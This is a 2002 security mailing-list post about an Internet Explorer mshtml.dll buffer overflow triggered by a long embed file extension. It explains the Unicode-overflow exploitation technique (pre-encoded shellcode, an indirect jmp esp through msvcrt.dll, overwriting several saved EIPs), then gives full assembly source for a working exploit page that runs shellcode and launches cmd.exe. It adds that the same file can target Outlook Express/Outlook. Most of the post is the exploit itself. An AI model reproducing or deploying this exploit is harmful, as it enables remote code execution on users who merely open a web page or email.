Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general)

From: 3APA3A (3APA3Aat_private)
Date: Wed Feb 27 2002 - 05:15:32 PST

    Advisory  was  originally  posted  in [1-3] 2 weeks ago, so I think it's
    enough  time  passed  to publish some details, because [4,5] have enough
    information to re-discover vulnerability.
    ERRor  <error(at)>  discovered  IE  5.5 and 6.0 in some cases
    crash on
     <embed src="filename.AAAAAAAAAA<lot of 'A's>">
    with EIP 0x41004100.
    Overflow    occurs    then    IE    concatenates   file   extension   to
    "Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
    with  wcscat().
    There  is another input validation bug in Internet Explorer: it fails to
    detect  if  file  has no extension. In this case it looks for dot before
    filename  and  treats everything after that dot like an extension... So,
    it's possible to overflow buffer with long filename without extension.
    The rest of this paper is for vuln-dev :)
    It's  a  kind  of  Unicode buffer overflow so much discussed on Vuln-Dev
    some  time  ago.  Usually  we  do  not code and release any exploits for
    "standard"  holes  like  format  strings  or  overflows  and  only point
    vulnerability  is  exploitable. The only reason of this paper is to show
    how  easy  is exploitation of this sort of bug. In future we do not plan
    to release any exploits of this kind.
    There are few problems for one who wants to create exploit:
    1.  All  data  is converted to Unicode, that is 'A' will be converted to
    2.  Address  of  shellcode will be different depending on number of open
    Internet  Explorer  windows,  Windows  and Internet Explorer version and
    patches installed.
    3.  There is different offset of saved EIP in stack in Internet Explorer
    before and after IE5.5SP2.
    4.  A couple of small problems we will not describe, because it may help
    to stop virus or scriptkiddie with exploit if one appear in-the-wild.
    Now  you  can  try  to  exploit this bug by yourself... I've got working
    exploit after half of hour without using any debugger/disassembler :)
    One  of  the first Unicode overflows found in-the-wild was vulnerability
    in IIS ISAPI filter found by eEye[6]. They failed to make really working
    exploit,  saying  exploiting  of  this kind of bug is hard. This bug was
    successfully  exploited  by hsj and later by authors of CodeRed worm. It
    brings  us to the fact: EXPLOITATION OF UNICODE OVERFLOWS IS EASY. There
    is  easy way to bypass conversion of the shellcode to Unicode: it should
    be  in  Unicode  already.  It  was  a  trick  used by CodeRed (wonderful
    analysis  of  CodeRed was made by Andrey Kolishak in [7]). I wrote about
    Unicode  HTMLs  in  [8]  (in  fact  [8] was released to prevent possible
    impacts  of  this  paper  but didn't succeeded, because multiple filters
    still don't check Unicode htmls).
    Andrey  pointed  to  easy (and well known) way to avoid second problem -
    hardcoded  shellcode  address.  Instead  of  overwriting  saved EIP with
    address  of  our shellcode we can use indirect jump - overwrite eip with
    address  of instruction in memory space of some dll which will jump back
    to  our  code  via  ebp  or  esp  (ebp  may be used if exploiting format
    strings).  We fond jmp esp (FFE4) in all versions of kernel32.dll and in
    one  version  of  msvcrt.dll  (6.10.8924.0). This version of dll doesn't
    depend on Internet Explorer and presents in most installation of Windows
    NT  4.0  and Windows 2000 we checked (but never in Windows 95/98/ME/XP),
    so we used it.
    Third  problem  was  solved  by overwriting all possible EIPs, using few
    noops and
      call xxxx
      pop ebp
    combination to get the exact address of our shellcode.
    Since  exploit  is  in  Unicode  we  may do not care about '\0' (0x0000,
    0xFFFF are prohibited and we have to care about calls and far jumps) so,
    we  did  large  shellcode  with  visual  effects. If you like it you can
    download  full  version  of  dH  & SECURITY.NNOV Matrix screensaver from
    Resulting HTML (will work with msvcrt.dll 6.10.8924.0 and doesn't depend
    on mshtml.dll version, program used and Windows version) can be obtained
    from    Same   file
    (properly  encoded  to  UTF-7, UTF-8, quoted-printable or base64) may be
    used  to  exploit Outlook Express/Outlook. (I've just noticed that under
    Windows  2000  terminal  window  sometimes is open in background and you
    need  to  switch... Well... It's not good but I don't bother to patch it
    :) ).
    Below is source code for matrix.htm:
    -=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
    ;   matrix.asm - source code for matrix.htm
    ;   build:
    ;   tasm matrix.asm /m2
    ;   tlink matrix.obj, matrix.htm /t /3
    ;   Authors:
    ;     ERROR:    bug discovery
    ;     3APA3A:   idea and coding
    ;     OFFliner: matrix effects and undocumented Windows API
    ;   Thanx to Andrey Kolishak for indirect esp jump idea
    ;     you can obtain matrix screensaver from
    ;  eipjmp: overwrites saved EIP for all versions of
    ;          mshtml.dll
    ;  espjmp: gets control after jmp esp and calls code1
    ;  code1:  restores EIP from stack after call to ebp
    ;          does some actions and jumps to code2
    ;  code2:  does the rest of actions
    datap           equ (DataTable+080h)
    hKernel32       equ LoadL-datap
    cCur            equ StringTable-datap
    SetCCH          equ StringTable+4-datap
    GetSH           equ StringTable+8-datap
    Sleep           equ StringTable+12-datap
    WriteC          equ StringTable+16-datap
    AllocC          equ StringTable+20-datap
    SetCDM          equ StringTable+24-datap
    SetCTA          equ StringTable+28-datap
    SetCCI          equ StringTable+32-datap
    WinE            equ StringTable+36-datap
    ExitP           equ StringTable+40-datap
    hStdOut         equ StringTable+48-datap
    dwOldMode       equ cCur
    conCur          equ StringTable+52-datap
    cls             equ StringTable+56-datap
    DWNumChar       equ StringTable+60-datap
    RegHK           equ user-datap
    _faked  segment para public 'CODE' use32
           assume cs:_faked
    _faked   ends
    _main  segment para public 'DATA' use32
           assume cs:_main
            begin   db      0ffh,0feh               ;Unicode prefix
                    db      "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                    db      "s",0,"r",0,"c",0,"=",0,34,0
                    db      "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                    db      "w",0,"w",0,"w",0,".",0
                    db      "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                    db      "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                    db      "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                    db      "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                    db      "!(c)3APA3A"
                    db      22 dup(090h)
            pop ebp
            mov esp,ebx
            xor eax,eax
    dataoffset = DataTable - code2
    ebpdiff = 80h + dataoffset
            mov ax,ebpdiff
            add ebp,eax                     ;ebp points to data
            lea eax,[ebp+user-datap]
            push eax
            mov ebx,[ebp+LoadL-datap]
            mov eax,[ebx]
            mov [ebp+LoadL-datap],eax
            call eax                        ;LoadLibraryA("user32.dll")
            lea ebx,[ebp+reg-datap]
            push ebx
            push eax
            mov ebx,[ebp+GetPA-datap]
            mov eax,[ebx]
            mov [ebp+GetPA-datap],eax
            call eax                        ;GetProcAddress(.,"RegisterHotKey")
            mov [ebp+RegHK],eax
            lea edi,[ebp+rhk-datap]
            movzx esi,byte ptr[edi]
            inc edi
            xor eax,eax
            mov al,[edi]
            push eax
            inc edi
            mov al,[edi]
            push eax
            inc edi
            mov al,[edi]
            push eax
            xor eax,eax
            push eax
            call [ebp+RegHK]
            dec esi
            or esi,esi
            jnz LoopHotKey
            lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
            push eax
            call [ebp+LoadL-datap]          ;LoadLibraryA("kernel32.dll")
            mov [ebp+hKernel32],eax         ;hKernel32 = 
            lea eax, [ebp+SetCCH]
            mov [ebp+cCur],eax              ;*cCur = SetCCH
            lea edi,[ebp+funcnum-datap]
            movzx esi,byte ptr[edi]         ;esi=funcnum
            inc edi
            push edi
            push dword ptr [ebp+Hkernel32]
            call [ebp+GetPA-datap]          ;GetProcAddress(edi)
            mov ebx,[ebp+cCur]
            mov [ebx],eax                   ;save func address
            xor ecx,ecx
            mov cl,4
            add ebx,ecx
            mov [ebp+cCur],ebx              ;cCur+=4
            not ecx
            xor eax,eax
            repnz scasb                     ;find \0
            dec esi
            or esi,esi
            jnz LoopResolve
            call [ebp+AllocC]               ;AllocConsole()
            push eax                        ;nonzero if succeed
            xor eax,eax
            push eax
            call [ebp+SetCCH]               ;SetConsoleCtrlHandler(NULL,TRUE)
            xor eax,eax
            not eax
            sub al,0Ah
            push eax
            call [ebp+GetSH]                ;GetStdHandle(STD_OUTPUT_HANDLE)
            mov [ebp+hStdOut],eax           ;hStdOut=
            lea eax,[ebp+dwOldMode]
            push eax
            xor ebx,ebx
            inc ebx
            push ebx
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCDM]               ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
            xor ebx,ebx
            mov bl,0Ah
            push ebx
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCTA]               ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN) 
            xor ebx,ebx
            mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = 100
            mov bl, 100
            mov [ebp+ConCur],ebx            ;ConCur.dwSize = 0
            lea eax, [ebp+ConCur]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCCI]               ;SetConsoleCursorInfo(hstdOut,&ConCur)
            xor eax,eax
            mov ax,1000
            push eax
            call[ebp+Sleep]                 ;Sleep(1000);
            xor ebx,ebx
            mov bl, string-datap
            mov eax,ebp
            add eax,ebx
            mov [ebp+cCur],eax              ;cCur = string
            mov eax,ebp
            mov bx,datap-empty_string
            sub eax,ebx
            mov [ebp+cls],eax               ;set address of empty_string
    LOOP1:                                  ;do do
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            inc eax
            push eax
            mov eax,[ebp+cCur]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+WriteC]               ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
            xor eax,eax
            mov al,100
            mov ecx,[ebp+cCur]
            mov bl,[ecx]
            sub bl,20
            jnz N1
            mov ax,400
    N1:     mov bl,[ecx]
            sub bl,8
            jnz N2
            mov ax,2100
    N2:     push eax
            call [ebp+Sleep]                ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
            mov ecx,[ebp+cCur]
            inc ecx
            mov [ebp+cCur],ecx              ;++cCur
            mov bl,[ecx]
            sub bl,9
            jnz LOOP1                       ;while(*cCur!='\t');
            call [ebp+cls]
            mov ecx,[ebp+cCur]
            inc ecx
            mov [ebp+cCur],ecx              ;++cCur
            mov bl,[ecx]
            sub bl,00Ah
            jnz LOOP1                       ;while(*cCur!='\n');
            inc ecx
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            mov al,18
            push eax
            push ecx
            push dword ptr [ebp+hStdOut]
            jmp code2
    codelength  = $ - begin
    neednoops = 1d4h - codelength
                    db neednoops dup(090h)
                    dd      78024e02h
                    dd      78024e02h
                    dd      78024e02h
                    dd      78024e02h
                    dw      9090h
                    dd      78024e02h       ;EIP for IE < 55SP2
                    db 18 dup(090h)
            xor eax,eax                     ;ESP comes here
            mov ax,0170h
            mov ebx,esp
            sub ebx,eax
            call ebx
            call [ebp+WriteC]
            xor eax,eax
            mov ax,4000
            push eax
            call [ebp+Sleep]
            call [ebp+cls]
            lea eax,[ebp+cmdexe-datap]
            push eax
            push eax
            call [ebp+WinE]
            xor eax,eax
            push eax
            call [ebp+ExitP]
            ; some code can be pasted here
            xor eax,eax
            mov ax,1000
            push eax
            call [ebp+Sleep]        ;Sleep(1000)
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            mov al,30
            push eax
            lea eax,[ebp+empty-datap]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+WriteC]
            LoadL   dd      780330d0h       ;LoadLibraryA import table entry
            GetPA   dd      780330cch       ;GetProcAddress import table entry
                    db      "kernel32.dll",0
            funcnum db      10
                    db      "SetConsoleCtrlHandler",0
                    db      "GetStdHandle",0
                    db      "Sleep",0
                    db      "WriteConsoleA",0
                    db      "AllocConsole",0
                    db      "SetConsoleDisplayMode",0
                    db      "SetConsoleTextAttribute",0
                    db      "SetConsoleCursorInfo",0
                    db      "WinExec",0
                    db      "ExitProcess",0
            user    db      "user32.dll",0
            reg     db      "RegisterHotKey",0
            cmdexe  db      "cmd.exe",0
            rhk     db      5
                    db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
            empty   db      00dh,28 dup(020h),00dh,0
            string  db      00dh," Wake Up, Neo...",00dh,009h,0
                    db      00dh," The Matrix has you...",00dh,009h,0
                    db      00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                    db      00dh," Knock, knock...",00dh,0
            padding db      32
                    db      34,0,">",0,00ah
            copy    db      "(c) 2002 by 3APA3A, ERRor, OFFLiner"
    _main   ends
       end  start
    -=-=-=-=-=-=-=-=-  end matrix.asm  -=-=-=-=-=-=-=-=-
    [1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
    [2] Microsoft Security Bulletin MS02-005
    [3] CAN-2002-0022
    [4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
        Internet Explorer
    [5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
    [6] All versions of Microsoft Internet Information Services Remote
        buffer overflow (SYSTEM Level Access)
    [7] Andrey Kolishak, History of one vulnerability (in Russian)
    [8] Bypassing content filtering software
